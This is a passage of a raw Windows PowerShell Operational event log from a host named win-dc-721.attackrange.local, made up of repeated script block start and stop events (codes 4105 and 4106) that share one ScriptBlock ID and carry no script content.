06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470292
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470291
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470290
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470289
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470288
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470287
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470286
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470285
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470284
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470283
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470282
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470281
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470280
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470279
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470278
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470277
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470276
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470275
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470274
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470273
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470272
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470271
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470270
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470269
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470268
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470267
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470266
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470265
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470264
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470263
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470262
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470261
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470260
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470259
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470258
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470257
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470256
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470255
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470254
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470253
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470252
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470251
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470250
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470249
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470248
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470247
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470246
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470245
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470244
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470243
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470242
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470241
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470240
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470239
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470238
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
